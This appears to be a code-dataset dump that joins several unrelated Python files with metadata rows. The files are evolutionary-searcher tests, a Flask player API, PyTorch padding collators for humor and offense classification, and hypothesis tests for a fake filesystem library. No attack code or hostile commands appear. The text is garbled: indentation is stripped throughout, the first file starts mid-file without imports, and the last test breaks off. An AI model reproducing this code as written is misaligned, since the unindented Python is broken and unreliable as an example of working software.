from hypernets.searchers.evolution_searcher import Population, EvolutionSearcher
def get_space():
space = HyperSpace()
with space.as_default():
p1 = Int(1, 100)
p2 = Choice(['a', 'b'])
p3 = Bool()
p4 = Real(0.0, 1.0)
id1 = Identity(p1=p1)
id2 = Identity(p2=p2)(id1)
id3 = Identity(p3=p3)(id2)
id4 = Identity(p4=p4)(id3)
return space
class Test_Evolution():
def test_population(self):
population = Population(optimize_direction=OptimizeDirection.Maximize, random_state=np.random.RandomState(9527))
population.append('a', 0)
population.append('b', 1)
population.append('c', 2)
population.append('d', 3)
population.append('e', 4)
population.append('f', 5)
population.append('g', 6)
population.append('h', 7)
population.append('i', 8)
population.append('i', 9)
b1 = population.sample_best(25)
assert b1.reward == 8
population = Population(optimize_direction=OptimizeDirection.Minimize, random_state=np.random.RandomState(9527))
population.append('a', 0)
population.append('b', 1)
population.append('c', 2)
population.append('d', 3)
population.append('e', 4)
population.append('f', 5)
population.append('g', 6)
population.append('h', 7)
population.append('i', 8)
population.append('i', 9)
b2 = population.sample_best(25)
assert b2.reward == 0
def test_eliminate(self):
population = Population(optimize_direction=OptimizeDirection.Maximize)
population.append('a', 4)
population.append('b', 3)
population.append('c', 2)
population.append('d', 1)
population.append('e', 0)
population.append('f', 5)
population.append('g', 6)
population.append('h', 7)
population.append('i', 8)
population.append('j', 9)
eliminates = population.eliminate(2, regularized=True)
assert eliminates[0].space_sample == 'a' and eliminates[1].space_sample == 'b'
eliminates = population.eliminate(2, regularized=False)
assert eliminates[0].space_sample == 'e' and eliminates[1].space_sample == 'd'
def test_mutate(self):
def get_space():
space = HyperSpace()
with space.as_default():
id1 = Identity(p1=Int(0, 10), p2=Choice(['a', 'b']))
id2 = Identity(p3=Real(0., 1.), p4=Bool())(id1)
return space
# population = Population(optimize_direction=OptimizeDirection.Maximize)
population = Population(optimize_direction='max')
space1 = get_space()
space1.random_sample()
assert space1.all_assigned
space2 = get_space()
assert not space2.all_assigned
new_space = population.mutate(space1, space2)
pv1 = list(space1.get_assigned_param_values().values())
pv2 = list(space2.get_assigned_param_values().values())
assert space2.all_assigned
assert new_space.all_assigned
assert np.sum([v1 != v2 for v1, v2 in zip(pv1, pv2)]) == 1
def test_set_random_state(self):
from hypernets.core import set_random_state
set_random_state(9527)
searcher = EvolutionSearcher(get_space, 5, 3, regularized=False, optimize_direction=OptimizeDirection.Maximize)
vectors = []
for i in range(1, 10):
vectors.append(searcher.sample().vectors)
assert vectors == [[98, 0, 0, 0.96], [9, 0, 0, 0.93], [60, 0, 1, 0.24], [54, 0, 1, 0.7],
[25, 0, 1, 0.73], [67, 1, 1, 0.43], [57, 1, 1, 0.05], [49, 0, 0, 0.71], [71, 1, 1, 0.49]]
set_random_state(None)
searcher = EvolutionSearcher(get_space, 5, 3, regularized=False, optimize_direction=OptimizeDirection.Maximize)
vectors = []
for i in range(1, 10):
vectors.append(searcher.sample().vectors)
assert vectors != [[98, 0, 0, 0.96], [9, 0, 0, 0.93], [60, 0, 1, 0.24], [54, 0, 1, 0.7],
[25, 0, 1, 0.73], [67, 1, 1, 0.43], [57, 1, 1, 0.05], [49, 0, 0, 0.71], [71, 1, 1, 0.49]]
set_random_state(9527)
searcher = EvolutionSearcher(get_space, 5, 3, regularized=False, optimize_direction=OptimizeDirection.Maximize)
vectors = []
for i in range(1, 10):
vectors.append(searcher.sample().vectors)
assert vectors == [[98, 0, 0, 0.96], [9, 0, 0, 0.93], [60, 0, 1, 0.24], [54, 0, 1, 0.7],
[25, 0, 1, 0.73], [67, 1, 1, 0.43], [57, 1, 1, 0.05], [49, 0, 0, 0.71], [71, 1, 1, 0.49]]
set_random_state(1)
searcher = EvolutionSearcher(get_space, 5, 3, regularized=False, optimize_direction=OptimizeDirection.Maximize)
vectors = []
for i in range(1, 10):
vectors.append(searcher.sample().vectors)
assert vectors == [[38, 1, 0, 0.93], [10, 1, 1, 0.15], [17, 1, 0, 0.39], [7, 1, 0, 0.85], [19, 0, 1, 0.44],
[29, 1, 0, 0.67], [88, 1, 1, 0.43], [95, 0, 0, 0.8], [10, 1, 1, 0.09]]
set_random_state(None)
# def test_searcher_with_hp(self):
# def get_space():
# space = HyperSpace()
# with space.as_default():
# in1 = Input(shape=(10,))
# in2 = Input(shape=(20,))
# in3 = Input(shape=(1,))
# concat = Concatenate()([in1, in2, in3])
# dense1 = Dense(10, activation=Choice(['relu', 'tanh', None]), use_bias=Bool())(concat)
# bn1 = BatchNormalization()(dense1)
# dropout1 = Dropout(Choice([0.3, 0.4, 0.5]))(bn1)
# output = Dense(2, activation='softmax', use_bias=True)(dropout1)
# return space
#
# rs = EvolutionSearcher(get_space, 5, 3, regularized=False, optimize_direction=OptimizeDirection.Maximize)
# hk = HyperKeras(rs, optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'],
# callbacks=[SummaryCallback()])
#
# x1 = np.random.randint(0, 10000, size=(100, 10))
# x2 = np.random.randint(0, 100, size=(100, 20))
# x3 = np.random.normal(1.0, 100.0, size=(100))
# y = np.random.randint(0, 2, size=(100), dtype='int')
# x = [x1, x2, x3]
#
# hk.search(x, y, x, y, max_trials=10)
# assert hk.get_best_trial()
# best_trial = hk.get_best_trial()
#
# estimator = hk.final_train(best_trial.space_sample, x, y)
# score = estimator.predict(x)
# result = estimator.evaluate(x, y)
# assert len(score) == 100
# assert result
| 39.965714
| 120
| 0.570489
| 6,358
| 0.909065
| 0
| 0
| 0
| 0
| 0
| 0
| 1,623
| 0.232056
|
9fe3efc076ac50b9a73eb652fb87630b07aba672
| 286
|
py
|
Python
|
backend/api/api.py
|
iamdempa/react-flask-postgres-boilerplate-with-docker
|
f1d74dfa08777ff2aeef3ed2620087855d6e30c3
|
[
"Apache-2.0"
] | 67
|
2018-10-02T04:04:15.000Z
|
2022-03-30T17:43:56.000Z
|
backend/api/api.py
|
iamdempa/react-flask-postgres-boilerplate-with-docker
|
f1d74dfa08777ff2aeef3ed2620087855d6e30c3
|
[
"Apache-2.0"
] | null | null | null |
backend/api/api.py
|
iamdempa/react-flask-postgres-boilerplate-with-docker
|
f1d74dfa08777ff2aeef3ed2620087855d6e30c3
|
[
"Apache-2.0"
] | 30
|
2018-11-21T22:55:08.000Z
|
2022-03-01T16:55:53.000Z
|
from flask import jsonify
from flask_restful import Resource, Api
from .models import Player as PlayerModel, to_dict
api = Api()
class Player(Resource):
def get(self):
return jsonify([to_dict(player) for player in PlayerModel.query.all()])
api.add_resource(Player, '/')
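A hedged sketch of how this Api instance could be attached to a Flask application (the wiring below is an assumption, not part of this file; PlayerModel also needs its database binding configured before Player.get will return data):
from flask import Flask
from api.api import api   # module path taken from the repo layout above
app = Flask(__name__)
api.init_app(app)          # exposes the Player resource at '/'
if __name__ == '__main__':
    app.run()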
| 22
| 79
| 0.734266
| 122
| 0.426573
| 0
| 0
| 0
| 0
| 0
| 0
| 3
| 0.01049
|
9fe5a28b405ba0411a5720a42bbe49f07b08a96f
| 8,697
|
py
|
Python
|
core/data/collators.py
|
manzar96/st7
|
8dac6fa3497e5a3594766a232a9e8436120e9563
|
[
"MIT"
] | null | null | null |
core/data/collators.py
|
manzar96/st7
|
8dac6fa3497e5a3594766a232a9e8436120e9563
|
[
"MIT"
] | null | null | null |
core/data/collators.py
|
manzar96/st7
|
8dac6fa3497e5a3594766a232a9e8436120e9563
|
[
"MIT"
] | null | null | null |
import torch
from torch.nn.utils.rnn import pad_sequence, pack_padded_sequence
from core.utils.masks import pad_mask, subsequent_mask
from core.utils.tensors import mktensor
class Task71aCollator(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, is_humor = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
is_humor = mktensor(is_humor, dtype=torch.long)
return padded_inputs,inputs_pad_mask, is_humor
class Task71aCollatorTest(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, is_humor = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
return myid, padded_inputs, inputs_pad_mask
class Task71aCollatorFeatures(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, is_humor = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
is_humor = mktensor(is_humor, dtype=torch.long)
return myid, padded_inputs,inputs_pad_mask, is_humor
class ShortTextDatasetCollator(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
text_input, is_humor = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
is_humor = mktensor(is_humor, dtype=torch.long)
return padded_inputs,inputs_pad_mask, is_humor
class Task723Collator(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, humor_rating,humor_contr = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
humor_rating = mktensor(humor_rating, dtype=torch.float)
humor_contr = mktensor(humor_contr, dtype=torch.long)
return padded_inputs,inputs_pad_mask, humor_rating, humor_contr
class Task723CollatorTest(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, humor_rat, humor_contr = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
return myid, padded_inputs, inputs_pad_mask
class Task723CollatorFeatures(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, humor_rating,humor_contr = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
humor_rating = mktensor(humor_rating, dtype=torch.float)
humor_contr = mktensor(humor_contr, dtype=torch.long)
return myid, padded_inputs,inputs_pad_mask, humor_rating, humor_contr
class Task74Collator(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, off = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
off = mktensor(off, dtype=torch.float)
return padded_inputs,inputs_pad_mask, off
class Task74CollatorTest(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, off = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
return myid, padded_inputs, inputs_pad_mask
class Task74CollatorFeatures(object):
def __init__(self, pad_indx=0, device='cpu'):
self.pad_indx = pad_indx
self.device = device
def __call__(self, batch):
myid, text_input, off = map(list, zip(*batch))
input_lengths = torch.tensor(
[len(s) for s in text_input], device=self.device)
# attention mask
max_length = max(input_lengths)
inputs_pad_mask = pad_mask(input_lengths, max_length=max_length,
device=self.device)
# Pad inputs and targets
padded_inputs = (
pad_sequence(text_input, batch_first=True,
padding_value=self.pad_indx)
.to(self.device))
off = mktensor(off, dtype=torch.float)
return myid, padded_inputs, inputs_pad_mask,off
| 33.321839
| 77
| 0.609176
| 8,493
| 0.976544
| 0
| 0
| 0
| 0
| 0
| 0
| 450
| 0.051742
|
9fe62e0a759bb38c6001a97c2d2f6695ebbb34cb
| 22,748
|
py
|
Python
|
tests/filesystem_tests.py
|
d-kiss/fakeos
|
88dff667830efe10841df8b3a5f33a581bd94b69
|
[
"MIT"
] | 1
|
2017-10-09T10:59:43.000Z
|
2017-10-09T10:59:43.000Z
|
tests/filesystem_tests.py
|
d-kiss/fakeos
|
88dff667830efe10841df8b3a5f33a581bd94b69
|
[
"MIT"
] | 5
|
2017-10-06T17:33:37.000Z
|
2017-10-13T16:31:34.000Z
|
tests/filesystem_tests.py
|
rinslow/fakeos
|
88dff667830efe10841df8b3a5f33a581bd94b69
|
[
"MIT"
] | null | null | null |
import operator
import os as _os
from pathlib import Path
from string import ascii_letters
from itertools import chain, permutations
from functools import reduce
from fakeos import FakeOS
from hypothesis import given, assume, example
from hypothesis.strategies import text, sets, integers, lists, just
from filesystem import FakeDirectory, FakeFile, FakeFilesystem, \
FakeFilesystemWithPermissions
from fakeuser import FakeUser, Root
from unittest import TestCase
from operating_system import FakeWindows, FakeUnix
ILLEGAL_NAMES = ("", ".", "..")
class DirectoryCase(TestCase):
@given(text())
def test_mkdir_when_directory_already_exists(self, directory: str):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
with self.assertRaises(FileExistsError):
os.mkdir("/" + directory)
@given(text())
def test_mkdir_when_parent_directory_doesnt_exist(self, directory: str):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
with self.assertRaises(FileNotFoundError):
os.mkdir("/hello/" + directory)
@given(text(), text())
def test_mkdir_and_directory_exists_afterwards(self, directory: str, _file: str):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
assume("/" not in _file and _file not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
os.mkdir("/" + directory + "/" + _file)
assert os.filesystem.has(Path("/" + directory + "/" + _file))
@given(text())
def test_mkdir_works(self, directory):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
@given(text())
def test_creating_root_directory(self, directory):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(directory)
assert os.filesystem.has_directory(Path(directory))
@given(text(), sets(text()))
@example("0", set())
def test_listdir_with_subdirectories_only(self, directory, subdirectories):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
for subdirectory in subdirectories:
assume(subdirectory not in ILLEGAL_NAMES)
assume("/" not in subdirectory)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
for subdirectory in subdirectories:
os.mkdir("/" + directory + "/" + subdirectory)
assert sorted(subdirectories) == sorted(os.listdir("/" + directory))
@given(text())
def test_listdir_empty_directory(self, directory):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))]))
os.mkdir("/" + directory)
assert os.listdir("/" + directory) == []
@given(text(), text())
def test_listdir_with_a_file_inside(self, directory, filename):
assume("/" not in directory and directory not in ILLEGAL_NAMES)
assume("/" not in filename and filename not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))],
files=[FakeFile(Path("/" +
directory +
"/" +
filename))]
))
os.mkdir("/" + directory)
assert os.listdir("/" + directory) == [filename]
@given(text(), text(), text())
def test_listdir_with_a_file_and_a_directory_inside(self, directory,
filename, subdirectory):
assume(subdirectory != filename)
assume("/" not in directory and directory not in ILLEGAL_NAMES)
assume("/" not in filename and filename not in ILLEGAL_NAMES)
assume("/" not in subdirectory and subdirectory not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path("/"))],
files=[FakeFile(Path("/" +
directory +
"/" +
filename))]
))
os.mkdir("/" + directory)
os.mkdir("/" + directory + "/" + subdirectory)
assert sorted(os.listdir("/" + directory)) == sorted([filename, subdirectory])
@given(text())
def test_makedirs_one_file_path(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(
filesystem=FakeFilesystem(directories=[FakeDirectory(Path(path))]))
with self.assertRaises(OSError):
os.makedirs(path)
try:
os.makedirs(path, exist_ok=True)
except OSError:
self.fail()
@given(text())
@example("/")
@example("/0")
def test_makedirs_multiple_file_path(self, path: str):
assume("/" in path and not path.startswith("."))
os = FakeOS()
os.makedirs(path)
with self.assertRaises(OSError):
os.makedirs(path)
@given(text())
def test_makedirs_when_part_of_the_path_exists_as_and_is_a_file(self, path: str):
assume("/" in path)
os = FakeOS(filesystem=FakeFilesystem(files=[FakeFile(Path(path))]))
dirname = Path(path).joinpath("dirname")
with self.assertRaises(FileExistsError):
os.makedirs(dirname)
@given(text())
@example("0")
def test_rmdir(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
fullpath = "/" + path
os.makedirs(fullpath)
assert path in os.listdir("/")
os.rmdir(fullpath)
assert path not in os.listdir("/")
with self.assertRaises(FileNotFoundError):
os.rmdir(fullpath)
os.makedirs(fullpath + "/hello")
with self.assertRaises(OSError):
os.rmdir(fullpath)
os = FakeOS(filesystem=FakeFilesystemWithPermissions(FakeFilesystem(
files=[FakeFile(Path(path))])))
with self.assertRaises(NotADirectoryError):
os.rmdir(path)
class ChownCase(TestCase):
@given(text(), integers(), integers())
def test_chown_to_a_directory(self, path: str, uid: int, gid: int):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chown(path, uid=uid, gid=gid)
assert os.filesystem[path].uid == uid
assert os.filesystem[path].gid == gid
@given(text(), integers(), integers())
def test_chown_to_a_file(self, path: str, uid: int, gid: int):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(filesystem=FakeFilesystem(files=[FakeFile(Path(path))]))
os.chown(path, gid=gid, uid=uid)
assert os.filesystem[path].uid == uid
assert os.filesystem[path].gid == gid
@given(text(), integers(), integers())
def test_chown_to_a_nonexisting_fileobject(self, path: str, uid: int,
gid: int):
os = FakeOS()
with self.assertRaises(FileNotFoundError):
os.chown(path, gid=gid, uid=uid)
@given(text(), integers(), integers())
def test_chown_not_changing_already_set_attributes(self, path: str,
uid: int, gid: int):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chown(path, uid=uid, gid=gid)
os.chown(path, uid=-1, gid=-1)
assert os.filesystem[path].gid == gid
assert os.filesystem[path].uid == uid
class ChmodCase(TestCase):
@given(text(), integers())
def test_chmod(self, path, mode):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chmod(path, mode)
assert os.filesystem[path].mode == mode
class FileCase(TestCase):
@given(text())
@example("0")
def test_remove_a_file(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(filesystem=FakeFilesystemWithPermissions(FakeFilesystem(
files=[FakeFile(Path("hello/" + path))])))
os.mkdir("hello")
assert os.listdir("hello") == [path]
os.remove("hello/" + path)
assert os.listdir("hello") == []
@given(text())
def test_remove_a_directory(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
with self.assertRaises(IsADirectoryError):
os.remove(path)
@given(text())
def test_remove_a_non_existent_file(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
with self.assertRaises(FileNotFoundError):
os.remove(path)
class CurrentDirectoryCase(TestCase):
@given(text())
def test_chdir(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
os.mkdir(path)
os.chdir(path)
assert os.getcwd() == str(Path(path).absolute())
@given(text())
def test_chdir_directory_does_not_exist(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS()
with self.assertRaises(FileNotFoundError):
os.chdir(path)
@given(text())
def test_chdir_directory_path_is_a_file(self, path):
assume("/" not in path and path not in ILLEGAL_NAMES)
os = FakeOS(filesystem=FakeFilesystem(files=[FakeFile(Path(path))]))
with self.assertRaises(NotADirectoryError):
os.chdir(path)
class DeviceCase(TestCase):
@given(integers(), integers())
def test_makedev(self, major, minor):
assume(-1 < major < 2 ** 31 and -1 < minor < 2 ** 31)
os = FakeOS()
assert os.makedev(major, minor) == _os.makedev(major, minor)
@given(integers())
def test_major(self, device):
assume(-1 < device < 2 ** 64)
os = FakeOS()
assert os.major(device) == _os.major(device)
@given(integers())
def test_minor(self, device):
assume(-1 < device < 2 ** 64)
os = FakeOS()
assert os.minor(device) == _os.minor(device)
class RenameCase(TestCase):
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_root_directory(self, old, new):
assume(old != new)
os = FakeOS()
os.mkdir(old)
os.rename(old, new)
with self.assertRaises(FileNotFoundError):
old_file = os.filesystem[Path(old)]
try:
new_file = os.filesystem[Path(new)]
except FileNotFoundError:
            self.fail("File was not renamed.")
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_non_root_directory(self, root, old, new):
os = FakeOS()
os.mkdir(root)
os.mkdir(root + "/" + old)
os.rename(root + "/" + old, root + "/" + new)
assert os.listdir(root) == [new]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_root_non_leaf_folder(self, old, new, inside):
os = FakeOS()
os.mkdir(old)
os.mkdir(old + "/" + inside)
os.rename(old, new)
assert os.listdir(new) == [inside]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_non_root_non_leaf_folder(self, old, new, inside, root):
os = FakeOS()
os.makedirs(root + "/" + old + "/" + inside)
os.rename(root + "/" + old, root + "/" + new)
assert os.listdir(root + "/" + new) == [inside]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_when_destination_exists_on_windows(self, old, new):
assume(old != new)
os = FakeOS(operating_system=FakeWindows())
os.mkdir(old)
os.mkdir(new)
with self.assertRaises(OSError):
os.rename(old, new)
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_when_destination_exists_on_unix(self, old, new, somefile):
assume(old != new)
os = FakeOS(operating_system=FakeUnix(),
filesystem=FakeFilesystem(files=[FakeFile(Path(old)),
FakeFile(Path(new))],
operating_system=FakeUnix()))
os.rename(old, new)
os.filesystem[Path(new)]
with self.assertRaises(OSError):
fileobject = os.filesystem[Path(old)]
@given(text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1),
text(alphabet=ascii_letters, min_size=1))
def test_renaming_a_folder_and_changing_its_hierarchy(self, a, b, c, d, e):
assume(e != b)
os = FakeOS()
os.makedirs(a + "/" + b + "/" + c + "/" + d)
os.rename(a + "/" + b + "/" + c, a + "/" + e)
assert set(os.listdir(a)) == {b, e}
assert os.listdir(a + "/" + e) == [d]
@given(text(alphabet=ascii_letters, min_size=1))
def test_renaming_to_the_same_thing(self, path):
os = FakeOS()
os.mkdir(path)
os.rename(path, path)
class AccessCase(TestCase):
def test_access_when_root(self):
os = FakeOS(user=Root())
os.mkdir("/", mode=0o000)
for access_modifier in (os.X_OK, os.W_OK, os.R_OK, os.F_OK):
assert os.access("/", access_modifier)
def test_access_exist(self):
os = FakeOS()
os.mkdir("/")
assert os.access("/", os.F_OK) and not os.access("other", os.F_OK)
def test_access_effective_ids(self):
os = FakeOS(user=FakeUser(gid=-2, uid=-2, is_sudoer=False))
os.setgid(0)
os.setuid(0)
assert os.getgid() == 0
assert os.getuid() == 0
os.mkdir("/", mode=0o070) # Group only
os.setgid(-7)
os.setuid(-7)
os.seteuid(0)
os.setegid(0)
assert not os.access("/", mode=os.R_OK)
assert os.access("/", mode=os.R_OK, effective_ids=True)
def test_access_when_owner(self):
os = FakeOS(user=FakeUser(gid=14, uid=42))
os.mkdir("r", mode=0o400)
os.mkdir("w", mode=0o200)
os.mkdir("x", mode=0o100)
os.mkdir("rw", mode=0o600)
os.mkdir("wx", mode=0o300)
os.mkdir("rx", mode=0o500)
os.mkdir("rwx", mode=0o700)
os.filesystem.set_user(FakeUser(gid=18, uid=42))
assert os.access("r", os.R_OK)
assert not os.access("r", os.W_OK)
assert not os.access("r", os.X_OK)
assert os.access("w", os.W_OK)
assert not os.access("w", os.R_OK)
assert not os.access("w", os.X_OK)
assert os.access("x", os.X_OK)
assert not os.access("x", os.R_OK)
assert not os.access("x", os.W_OK)
assert os.access("rw", os.R_OK)
assert os.access("rw", os.W_OK)
assert os.access("rw", os.R_OK | os.W_OK)
assert not os.access("rw", os.X_OK)
assert not os.access("rw", os.X_OK | os.W_OK)
assert os.access("wx", os.X_OK)
assert os.access("wx", os.W_OK)
assert os.access("wx", os.X_OK | os.W_OK)
assert not os.access("wx", os.R_OK)
assert not os.access("wx", os.X_OK | os.R_OK)
assert os.access("rx", os.X_OK)
assert os.access("rx", os.R_OK)
assert os.access("rx", os.X_OK | os.R_OK)
assert not os.access("rx", os.W_OK)
assert not os.access("rx", os.W_OK | os.R_OK)
assert os.access("rwx", os.R_OK)
assert os.access("rwx", os.X_OK)
assert os.access("rwx", os.F_OK)
assert os.access("rwx", os.R_OK | os.X_OK | os.W_OK)
assert os.access("rwx", os.X_OK | os.W_OK)
def test_access_when_everyone(self):
os = FakeOS(user=FakeUser(gid=-1, uid=-1))
os.mkdir("r", mode=0o004)
os.mkdir("w", mode=0o002)
os.mkdir("x", mode=0o001)
os.mkdir("rw", mode=0o006)
os.mkdir("wx", mode=0o003)
os.mkdir("rx", mode=0o005)
os.mkdir("rwx", mode=0o007)
os.filesystem.set_user(FakeUser(gid=0, uid=0))
assert os.access("r", os.R_OK)
assert not os.access("r", os.W_OK)
assert not os.access("r", os.X_OK)
assert os.access("w", os.W_OK)
assert not os.access("w", os.R_OK)
assert not os.access("w", os.X_OK)
assert os.access("x", os.X_OK)
assert not os.access("x", os.R_OK)
assert not os.access("x", os.W_OK)
assert os.access("rw", os.R_OK)
assert os.access("rw", os.W_OK)
assert os.access("rw", os.R_OK | os.W_OK)
assert not os.access("rw", os.X_OK)
assert not os.access("rw", os.X_OK | os.W_OK)
assert os.access("wx", os.X_OK)
assert os.access("wx", os.W_OK)
assert os.access("wx", os.X_OK | os.W_OK)
assert not os.access("wx", os.R_OK)
assert not os.access("wx", os.X_OK | os.R_OK)
assert os.access("rx", os.X_OK)
assert os.access("rx", os.R_OK)
assert os.access("rx", os.X_OK | os.R_OK)
assert not os.access("rx", os.W_OK)
assert not os.access("rx", os.W_OK | os.R_OK)
assert os.access("rwx", os.R_OK)
assert os.access("rwx", os.X_OK)
assert os.access("rwx", os.F_OK)
assert os.access("rwx", os.R_OK | os.X_OK | os.W_OK)
assert os.access("rwx", os.X_OK | os.W_OK)
def test_access_when_group(self):
os = FakeOS(user=FakeUser(gid=14, uid=42))
os.mkdir("r", mode=0o040)
os.mkdir("w", mode=0o020)
os.mkdir("x", mode=0o010)
os.mkdir("rw", mode=0o060)
os.mkdir("wx", mode=0o030)
os.mkdir("rx", mode=0o050)
os.mkdir("rwx", mode=0o070)
os.filesystem.set_user(FakeUser(gid=14, uid=56))
assert os.access("r", os.R_OK)
assert not os.access("r", os.W_OK)
assert not os.access("r", os.X_OK)
assert os.access("w", os.W_OK)
assert not os.access("w", os.R_OK)
assert not os.access("w", os.X_OK)
assert os.access("x", os.X_OK)
assert not os.access("x", os.R_OK)
assert not os.access("x", os.W_OK)
assert os.access("rw", os.R_OK)
assert os.access("rw", os.W_OK)
assert os.access("rw", os.R_OK | os.W_OK)
assert not os.access("rw", os.X_OK)
assert not os.access("rw", os.X_OK | os.W_OK)
assert os.access("wx", os.X_OK)
